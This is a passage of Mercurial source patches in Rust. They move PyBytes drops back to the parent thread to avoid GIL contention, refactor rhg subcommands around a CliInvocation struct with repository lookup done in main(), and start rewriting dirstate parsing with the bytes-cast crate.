= + rev_info.call(py, (rev_py,), None)?.cast_into(py)?; + let p1 = tuple.get_item(py, 0).extract(py)?; + let p2 = tuple.get_item(py, 1).extract(py)?; + let opt_bytes = tuple.get_item(py, 2).extract(py)?; + Ok((rev, p1, p2, opt_bytes)) + }); let path_copies = if !multi_thread { let mut combine_changeset_copies = @@ -67,7 +117,7 @@ // // TODO: tweak the bound? let (rev_info_sender, rev_info_receiver) = - crossbeam_channel::bounded::<RevInfo>(1000); + crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000); // Start a thread that does CPU-heavy processing in parallel with the // loop below. @@ -79,15 +129,16 @@ let mut combine_changeset_copies = CombineChangesetCopies::new(children_count); for (rev, p1, p2, opt_bytes) in rev_info_receiver { - let gil = Python::acquire_gil(); - let py = gil.python(); let files = match &opt_bytes { - Some(raw) => ChangedFiles::new(raw.data(py)), + Some(raw) => ChangedFiles::new(raw.data()), // Python None was extracted to Option::None, // meaning there was no copy data. None => ChangedFiles::new_empty(), }; combine_changeset_copies.add_revision(rev, p1, p2, files) + + // The GIL is (still) implicitly acquired here through + // `impl Drop for PyBytes`. } combine_changeset_copies.finish(target_rev) @@ -95,6 +146,7 @@ for rev_info in revs_info { let (rev, p1, p2, opt_bytes) = rev_info?; + let opt_bytes = opt_bytes.map(|b| PyBytesWithData::new(py, b)); // We’d prefer to avoid the child thread calling into Python code, // but this avoids a potential deadlock on the GIL if it does: # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609879581 -3600 # Tue Jan 05 21:46:21 2021 +0100 # Node ID 8d20abed6a1e1b4d95a9da626651d45102ec05c0 # Parent 620c88fb42a24c901a34c1e0028fc5f4e16ba9b4 copies-rust: send PyBytes values back be dropped ino the parent thread … instead of acquiring the GIL in the Rust thread in the Drop impl This commit is based on the premise that crossbeam-channel with unbounded send and non-blocking receive is faster than a contended GIL, but that remains to be measured. Differential Revision: https://phab.mercurial-scm.org/D9686 diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -1,6 +1,7 @@ use cpython::ObjectProtocol; use cpython::PyBytes; use cpython::PyDict; +use cpython::PyDrop; use cpython::PyList; use cpython::PyModule; use cpython::PyObject; @@ -58,6 +59,10 @@ // alive, and the returned slice borrows `self`. unsafe { &*self.data } } + + pub fn unwrap(self) -> PyBytes { + self.keep_alive + } } } @@ -93,7 +98,8 @@ Ok((rev, p1, p2, opt_bytes)) }); - let path_copies = if !multi_thread { + let path_copies; + if !multi_thread { let mut combine_changeset_copies = CombineChangesetCopies::new(children_count); @@ -108,7 +114,7 @@ combine_changeset_copies.add_revision(rev, p1, p2, files) } - combine_changeset_copies.finish(target_rev) + path_copies = combine_changeset_copies.finish(target_rev) } else { // Use a bounded channel to provide back-pressure: // if the child thread is slower to process revisions than this thread @@ -119,6 +125,13 @@ let (rev_info_sender, rev_info_receiver) = crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000); + // This channel (going the other way around) however is unbounded. + // If they were both bounded, there might potentially be deadlocks + // where both channels are full and both threads are waiting on each + // other. + let (pybytes_sender, pybytes_receiver) = + crossbeam_channel::unbounded(); + // Start a thread that does CPU-heavy processing in parallel with the // loop below. // @@ -135,10 +148,20 @@ // meaning there was no copy data. None => ChangedFiles::new_empty(), }; - combine_changeset_copies.add_revision(rev, p1, p2, files) + combine_changeset_copies.add_revision(rev, p1, p2, files); - // The GIL is (still) implicitly acquired here through - // `impl Drop for PyBytes`. + // Send `PyBytes` back to the parent thread so the parent + // thread can drop it. Otherwise the GIL would be implicitly + // acquired here through `impl Drop for PyBytes`. + if let Some(bytes) = opt_bytes { + if let Err(_) = pybytes_sender.send(bytes.unwrap()) { + // The channel is disconnected, meaning the parent + // thread panicked or returned + // early through + // `?` to propagate a Python exception. + break; + } + } } combine_changeset_copies.finish(target_rev) @@ -155,10 +178,15 @@ "combine_changeset_copies: channel is disconnected", ); }); + + // Drop anything in the channel, without blocking + for pybytes in pybytes_receiver.try_iter() { + pybytes.release_ref(py) + } } // We’d prefer to avoid the child thread calling into Python code, // but this avoids a potential deadlock on the GIL if it does: - py.allow_threads(|| { + path_copies = py.allow_threads(|| { // Disconnect the channel to signal the child thread to stop: // the `for … in rev_info_receiver` loop will end. drop(rev_info_sender); @@ -167,7 +195,12 @@ thread.join().unwrap_or_else(|panic_payload| { std::panic::resume_unwind(panic_payload) }) - }) + }); + + // Drop anything left in the channel + for pybytes in pybytes_receiver.iter() { + pybytes.release_ref(py) + } }; let out = PyDict::new(py); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613145270 -3600 # Fri Feb 12 16:54:30 2021 +0100 # Node ID 21d3b40b4c0eade15db624c7ed3bf1f7ed45c059 # Parent 8d20abed6a1e1b4d95a9da626651d45102ec05c0 rhg: Remove error message on unsupported CLI arguments Like in other "unsupported" cases that return a specific exit code Differential Revision: https://phab.mercurial-scm.org/D10002 diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -33,6 +33,14 @@ } } +/// For now we don’t differenciate between invalid CLI args and valid for `hg` +/// but not supported yet by `rhg`. +impl From<clap::Error> for CommandError { + fn from(_: clap::Error) -> Self { + CommandError::Unimplemented + } +} + impl From<HgError> for CommandError { fn from(error: HgError) -> Self { match error { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -33,7 +33,7 @@ ) } -fn main() { +fn main_with_result(ui: &ui::Ui) -> Result<(), CommandError> { env_logger::init(); let app = App::new("rhg") .setting(AppSettings::AllowInvalidUtf8) @@ -43,12 +43,7 @@ let app = add_global_args(app); let app = add_subcommand_args(app); - let ui = ui::Ui::new(); - - let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { - let _ = ui.writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED) - }); + let matches = app.clone().get_matches_safe()?; let (subcommand_name, subcommand_matches) = matches.subcommand(); let run = subcommand_run_fn(subcommand_name) @@ -69,16 +64,18 @@ }; let repo_path = value_of_global_arg("repository").map(Path::new); - let result = (|| -> Result<(), CommandError> { - let config_args = values_of_global_arg("config") - // `get_bytes_from_path` works for OsStr the same as for Path - .map(hg::utils::files::get_bytes_from_path); - let config = hg::config::Config::load(config_args)?; - run(&ui, &config, repo_path, args) - })(); + let config_args = values_of_global_arg("config") + // `get_bytes_from_path` works for OsStr the same as for Path + .map(hg::utils::files::get_bytes_from_path); + let config = hg::config::Config::load(config_args)?; + run(&ui, &config, repo_path, args) +} - let exit_code = match result { - Ok(_) => exitcode::OK, +fn main() { + let ui = ui::Ui::new(); + + let exit_code = match main_with_result(&ui) { + Ok(()) => exitcode::OK, // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. diff --git a/rust/rhg/src/ui.rs b/rust/rhg/src/ui.rs --- a/rust/rhg/src/ui.rs +++ b/rust/rhg/src/ui.rs @@ -49,11 +49,6 @@ stderr.flush().or_else(handle_stderr_error) } - - /// Write string line to stderr - pub fn writeln_stderr_str(&self, s: &str) -> Result<(), UiError> { - self.write_stderr(&format!("{}\n", s).as_bytes()) - } } /// A buffered stdout writer for faster batch printing operations. diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -12,12 +12,6 @@ Unimplemented command $ rhg unimplemented-command - error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context - - USAGE: - rhg [OPTIONS] <SUBCOMMAND> - - For more information try --help [252] Finding root # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613415932 -3600 # Mon Feb 15 20:05:32 2021 +0100 # Node ID 80840b651721efa5e194b2c995be5d1210a5eb2c # Parent 21d3b40b4c0eade15db624c7ed3bf1f7ed45c059 rhg: Group values passed to every sub-command into a struct The set of which values this is is evidently not stable yet, so this will make changes easier. Also it is growing, and the function signatures are getting out hand. Differential Revision: https://phab.mercurial-scm.org/D10003 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,14 +1,10 @@ use crate::error::CommandError; -use crate::ui::Ui; use clap::Arg; -use clap::ArgMatches; -use hg::config::Config; use hg::operations::cat; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; -use std::path::Path; pub const HELP_TEXT: &str = " Output the current or given revision of files @@ -36,19 +32,14 @@ } #[timed] -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { - let rev = args.value_of("rev"); - let file_args = match args.values_of("files") { +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let rev = invocation.subcommand_args.value_of("rev"); + let file_args = match invocation.subcommand_args.values_of("files") { Some(files) => files.collect(), None => vec![], }; - let repo = Repo::find(config, repo_path)?; + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; @@ -67,7 +58,7 @@ match rev { Some(rev) => { let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; - ui.write_stdout(&data)?; + invocation.ui.write_stdout(&data)?; Ok(()) } None => Err(CommandError::Unimplemented.into()), diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -1,13 +1,9 @@ use crate::error::CommandError; -use crate::ui::Ui; use clap::Arg; -use clap::ArgMatches; use format_bytes::format_bytes; -use hg::config::Config; use hg::errors::HgError; use hg::repo::Repo; use hg::utils::SliceExt; -use std::path::Path; pub const HELP_TEXT: &str = " With one argument of the form section.name, print just the value of that config item. @@ -25,20 +21,16 @@ .about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { - let opt_repo = Repo::find_optional(config, repo_path)?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let opt_repo = + Repo::find_optional(invocation.non_repo_config, invocation.repo_path)?; let config = if let Some(repo) = &opt_repo { repo.config() } else { - config + invocation.non_repo_config }; - - let (section, name) = args + let (section, name) = invocation + .subcommand_args .value_of("name") .expect("missing required CLI argument") .as_bytes() @@ -47,6 +39,6 @@ let value = config.get(section, name).unwrap_or(b""); - ui.write_stdout(&format_bytes!(b"{}\n", value))?; + invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) } diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,13 +1,9 @@ use crate::error::CommandError; -use crate::ui::Ui; use clap::Arg; use clap::ArgGroup; -use clap::ArgMatches; -use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; -use std::path::Path; pub const HELP_TEXT: &str = " Dump the contents of a data file revision @@ -42,12 +38,8 @@ } #[timed] -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let args = invocation.subcommand_args; let rev = args .value_of("rev") .expect("rev should be a required argument"); @@ -63,10 +55,10 @@ } }; - let repo = Repo::find(config, repo_path)?; + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; - let mut stdout = ui.stdout_buffer(); + let mut stdout = invocation.ui.stdout_buffer(); stdout.write_all(&data)?; stdout.flush()?; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,9 +1,5 @@ use crate::error::CommandError; -use crate::ui::Ui; -use clap::ArgMatches; -use hg::config::Config; use hg::repo::Repo; -use std::path::Path; pub const HELP_TEXT: &str = " Print the current repo requirements. @@ -13,13 +9,8 @@ clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - _args: &ArgMatches, -) -> Result<(), CommandError> { - let repo = Repo::find(config, repo_path)?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); @@ -27,6 +18,6 @@ output.push_str(req); output.push('\n'); } - ui.write_stdout(output.as_bytes())?; + invocation.ui.write_stdout(output.as_bytes())?; Ok(()) } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,14 +1,11 @@ use crate::error::CommandError; use crate::ui::Ui; use clap::Arg; -use clap::ArgMatches; -use hg::config::Config; use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; -use std::path::Path; pub const HELP_TEXT: &str = " List tracked files. @@ -29,23 +26,18 @@ .about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { - let rev = args.value_of("rev"); +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let rev = invocation.subcommand_args.value_of("rev"); - let repo = Repo::find(config, repo_path)?; + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; if let Some(rev) = rev { let files = list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; - display_files(ui, &repo, files.iter()) + display_files(invocation.ui, &repo, files.iter()) } else { let distate = Dirstate::new(&repo)?; let files = distate.tracked_files()?; - display_files(ui, &repo, files) + display_files(invocation.ui, &repo, files) } } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,11 +1,7 @@ use crate::error::CommandError; -use crate::ui::Ui; -use clap::ArgMatches; use format_bytes::format_bytes; -use hg::config::Config; use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; -use std::path::Path; pub const HELP_TEXT: &str = " Print the root directory of the current repository. @@ -17,14 +13,11 @@ clap::SubCommand::with_name("root").about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - _args: &ArgMatches, -) -> Result<(), CommandError> { - let repo = Repo::find(config, repo_path)?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + invocation + .ui + .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; Ok(()) } diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,9 +1,11 @@ extern crate log; +use crate::ui::Ui; use clap::App; use clap::AppSettings; use clap::Arg; use clap::ArgMatches; use format_bytes::format_bytes; +use hg::config::Config; use std::path::Path; mod error; @@ -48,31 +50,41 @@ let (subcommand_name, subcommand_matches) = matches.subcommand(); let run = subcommand_run_fn(subcommand_name) .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired"); - let args = subcommand_matches + let subcommand_args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); // Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. // `hg log -R ./foo` - let value_of_global_arg = - |name| args.value_of_os(name).or_else(|| matches.value_of_os(name)); + let value_of_global_arg = |name| { + subcommand_args + .value_of_os(name) + .or_else(|| matches.value_of_os(name)) + }; // For arguments where multiple occurences are allowed, return a // possibly-iterator of all values. let values_of_global_arg = |name: &str| { let a = matches.values_of_os(name).into_iter().flatten(); - let b = args.values_of_os(name).into_iter().flatten(); + let b = subcommand_args.values_of_os(name).into_iter().flatten(); a.chain(b) }; - let repo_path = value_of_global_arg("repository").map(Path::new); let config_args = values_of_global_arg("config") // `get_bytes_from_path` works for OsStr the same as for Path .map(hg::utils::files::get_bytes_from_path); - let config = hg::config::Config::load(config_args)?; - run(&ui, &config, repo_path, args) + let non_repo_config = &hg::config::Config::load(config_args)?; + + let repo_path = value_of_global_arg("repository").map(Path::new); + + run(&CliInvocation { + ui, + subcommand_args, + non_repo_config, + repo_path, + }) } fn main() { - let ui = ui::Ui::new(); + let ui = Ui::new(); let exit_code = match main_with_result(&ui) { Ok(()) => exitcode::OK, @@ -109,12 +121,9 @@ )+ } - fn subcommand_run_fn(name: &str) -> Option<fn( - &ui::Ui, - &hg::config::Config, - Option<&Path>, - &ArgMatches, - ) -> Result<(), CommandError>> { + pub type RunFn = fn(&CliInvocation) -> Result<(), CommandError>; + + fn subcommand_run_fn(name: &str) -> Option<RunFn> { match name { $( stringify!($command) => Some(commands::$command::run), @@ -133,3 +142,9 @@ root config } +pub struct CliInvocation<'a> { + ui: &'a Ui, + subcommand_args: &'a ArgMatches<'a>, + non_repo_config: &'a Config, + repo_path: Option<&'a Path>, +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613416389 -3600 # Mon Feb 15 20:13:09 2021 +0100 # Node ID 5ce2aa7c2ad50a996a1b1657754f2ba89c799fa9 # Parent 80840b651721efa5e194b2c995be5d1210a5eb2c rhg: Move `Repo` object creation into `main()` … rather than in each sub-command that needs a local repository. This will allow accessing e.g. `.hg/blackbox.log` before dispatching to sub-commands. Differential Revision: https://phab.mercurial-scm.org/D10004 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -81,28 +81,6 @@ } } - /// Like `Repo::find`, but not finding a repository is not an error if no - /// explicit path is given. `Ok(None)` is returned in that case. - /// - /// If an explicit path *is* given, not finding a repository there is still - /// an error. - /// - /// For sub-commands that don’t need a repository, configuration should - /// still be affected by a repository’s `.hg/hgrc` file. This is the - /// constructor to use. - pub fn find_optional( - config: &Config, - explicit_path: Option<&Path>, - ) -> Result<Option<Self>, RepoError> { - match Self::find(config, explicit_path) { - Ok(repo) => Ok(Some(repo)), - Err(RepoError::NotFound { .. }) if explicit_path.is_none() => { - Ok(None) - } - Err(error) => Err(error), - } - } - /// To be called after checking that `.hg` is a sub-directory fn new_at_path( working_directory: PathBuf, diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,7 +1,6 @@ use crate::error::CommandError; use clap::Arg; use hg::operations::cat; -use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; @@ -39,7 +38,7 @@ None => vec![], }; - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -2,7 +2,6 @@ use clap::Arg; use format_bytes::format_bytes; use hg::errors::HgError; -use hg::repo::Repo; use hg::utils::SliceExt; pub const HELP_TEXT: &str = " @@ -22,13 +21,6 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { - let opt_repo = - Repo::find_optional(invocation.non_repo_config, invocation.repo_path)?; - let config = if let Some(repo) = &opt_repo { - repo.config() - } else { - invocation.non_repo_config - }; let (section, name) = invocation .subcommand_args .value_of("name") @@ -37,7 +29,7 @@ .split_2(b'.') .ok_or_else(|| HgError::abort(""))?; - let value = config.get(section, name).unwrap_or(b""); + let value = invocation.config().get(section, name).unwrap_or(b""); invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -2,7 +2,6 @@ use clap::Arg; use clap::ArgGroup; use hg::operations::{debug_data, DebugDataKind}; -use hg::repo::Repo; use micro_timer::timed; pub const HELP_TEXT: &str = " @@ -55,8 +54,8 @@ } }; - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; - let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; + let repo = invocation.repo?; + let data = debug_data(repo, rev, kind).map_err(|e| (e, rev))?; let mut stdout = invocation.ui.stdout_buffer(); stdout.write_all(&data)?; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,5 +1,4 @@ use crate::error::CommandError; -use hg::repo::Repo; pub const HELP_TEXT: &str = " Print the current repo requirements. @@ -10,7 +9,7 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -29,15 +29,14 @@ pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { let rev = invocation.subcommand_args.value_of("rev"); - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; if let Some(rev) = rev { - let files = - list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; - display_files(invocation.ui, &repo, files.iter()) + let files = list_rev_tracked_files(repo, rev).map_err(|e| (e, rev))?; + display_files(invocation.ui, repo, files.iter()) } else { - let distate = Dirstate::new(&repo)?; + let distate = Dirstate::new(repo)?; let files = distate.tracked_files()?; - display_files(invocation.ui, &repo, files) + display_files(invocation.ui, repo, files) } } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,6 +1,5 @@ use crate::error::CommandError; use format_bytes::format_bytes; -use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; pub const HELP_TEXT: &str = " @@ -14,7 +13,7 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; let bytes = get_bytes_from_path(repo.working_directory_path()); invocation .ui diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,5 +1,6 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; +use crate::NoRepoInCwdError; use format_bytes::format_bytes; use hg::config::{ConfigError, ConfigParseError}; use hg::errors::HgError; @@ -64,7 +65,7 @@ match error { RepoError::NotFound { at } => CommandError::Abort { message: format_bytes!( - b"no repository found in '{}' (.hg not found)!", + b"repository {} not found", get_bytes_from_path(at) ), }, @@ -74,6 +75,18 @@ } } +impl<'a> From<&'a NoRepoInCwdError> for CommandError { + fn from(error: &'a NoRepoInCwdError) -> Self { + let NoRepoInCwdError { cwd } = error; + CommandError::Abort { + message: format_bytes!( + b"no repository found in '{}' (.hg not found)!", + get_bytes_from_path(cwd) + ), + } + } +} + impl From<ConfigError> for CommandError { fn from(error: ConfigError) -> Self { match error { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -6,7 +6,8 @@ use clap::ArgMatches; use format_bytes::format_bytes; use hg::config::Config; -use std::path::Path; +use hg::repo::{Repo, RepoError}; +use std::path::{Path, PathBuf}; mod error; mod exitcode; @@ -74,17 +75,25 @@ let non_repo_config = &hg::config::Config::load(config_args)?; let repo_path = value_of_global_arg("repository").map(Path::new); + let repo = match Repo::find(non_repo_config, repo_path) { + Ok(repo) => Ok(repo), + Err(RepoError::NotFound { at }) if repo_path.is_none() => { + // Not finding a repo is not fatal yet, if `-R` was not given + Err(NoRepoInCwdError { cwd: at }) + } + Err(error) => return Err(error.into()), + }; run(&CliInvocation { ui, subcommand_args, non_repo_config, - repo_path, + repo: repo.as_ref(), }) } fn main() { - let ui = Ui::new(); + let ui = ui::Ui::new(); let exit_code = match main_with_result(&ui) { Ok(()) => exitcode::OK, @@ -146,5 +155,22 @@ ui: &'a Ui, subcommand_args: &'a ArgMatches<'a>, non_repo_config: &'a Config, - repo_path: Option<&'a Path>, + /// References inside `Result` is a bit peculiar but allow + /// `invocation.repo?` to work out with `&CliInvocation` since this + /// `Result` type is `Copy`. + repo: Result<&'a Repo, &'a NoRepoInCwdError>, +} + +struct NoRepoInCwdError { + cwd: PathBuf, } + +impl CliInvocation<'_> { + fn config(&self) -> &Config { + if let Ok(repo) = self.repo { + repo.config() + } else { + self.non_repo_config + } + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613560016 -3600 # Wed Feb 17 12:06:56 2021 +0100 # Node ID f88e8ae0aa8fcde5249c0f902f719ce12a36ebaf # Parent 5ce2aa7c2ad50a996a1b1657754f2ba89c799fa9 rust: Rewrite dirstate parsing usin the `bytes-cast` crate Differential Revision: https://phab.mercurial-scm.org/D10005 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -310,7 +310,6 @@ "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)", "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -15,7 +15,6 @@ home = "0.5" im-rc = "15.0.*" lazy_static = "1.4.0" -memchr = "2.3.3" rand = "0.7.3" rand_pcg = "0.2.1" rand_distr = "0.2.2" diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -7,6 +7,7 @@ use crate::errors::HgError; use crate::{utils::hg_path::HgPathBuf, FastHashMap}; +use bytes_cast::{unaligned, BytesCast}; use std::collections::hash_map; use std::convert::TryFrom; @@ -17,7 +18,8 @@ pub mod parsers; pub mod status; -#[derive(Debug, PartialEq, Clone)] +#[derive(Debug, PartialEq, Clone, BytesCast)] +#[repr(C)] pub struct DirstateParents { pub p1: [u8; 20], pub p2: [u8; 20], @@ -34,6 +36,16 @@ pub size: i32, } +#[derive(BytesCast)] +#[repr(C)] +struct RawEntry { + state: u8, + mode: unaligned::I32Be, + size: unaligned::I32Be, + mtime: unaligned::I32Be, + length: unaligned::I32Be, +} + /// A `DirstateEntry` with a size of `-2` means that it was merged from the /// other parent. This allows revert to pick the right status back during a /// merge. diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -386,10 +386,10 @@ } #[timed] - pub fn read( + pub fn read<'a>( &mut self, - file_contents: &[u8], - ) -> Result<Option<DirstateParents>, DirstateError> { + file_contents: &'a [u8], + ) -> Result<Option<&'a DirstateParents>, DirstateError> { if file_contents.is_empty() { return Ok(None); } diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -6,13 +6,13 @@ use crate::errors::HgError; use crate::utils::hg_path::HgPath; use crate::{ - dirstate::{CopyMap, EntryState, StateMap}, + dirstate::{CopyMap, EntryState, RawEntry, StateMap}, DirstateEntry, DirstateParents, }; -use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; +use byteorder::{BigEndian, WriteBytesExt}; +use bytes_cast::BytesCast; use micro_timer::timed; use std::convert::{TryFrom, TryInto}; -use std::io::Cursor; use std::time::Duration; /// Parents are stored in the dirstate as byte hashes. @@ -21,65 +21,45 @@ const MIN_ENTRY_SIZE: usize = 17; type ParseResult<'a> = ( - DirstateParents, + &'a DirstateParents, Vec<(&'a HgPath, DirstateEntry)>, Vec<(&'a HgPath, &'a HgPath)>, ); #[timed] -pub fn parse_dirstate(contents: &[u8]) -> Result<ParseResult, HgError> { - if contents.len() < PARENT_SIZE * 2 { - return Err(HgError::corrupted("Too little data for dirstate.")); - } - let mut copies = vec![]; - let mut entries = vec![]; +pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, 